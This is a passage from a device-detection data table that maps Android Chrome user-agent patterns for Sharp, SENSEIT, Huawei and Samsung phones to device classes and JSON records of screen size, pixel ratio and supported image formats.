Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SENSEIT T250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SENSEIT W289) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SENSEIT_A150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-03G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-A01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-H01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SH-M05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SHV40_u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SKY 5.0Pro II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SKY 55M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SKY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SKY_Pro_III) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SL505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SL548) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLA-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLA-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLA-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SLplus02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A310N0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A320Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A5100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A510M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A520W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A710K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A710L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A710M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A710S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A800S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-A910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C7010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-C9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G1650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G390W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G530H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G550FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G5700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G570Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G600S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G6100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G610Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G611F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G611FF) AppleWebKit/* (KHTML, like Gecko) 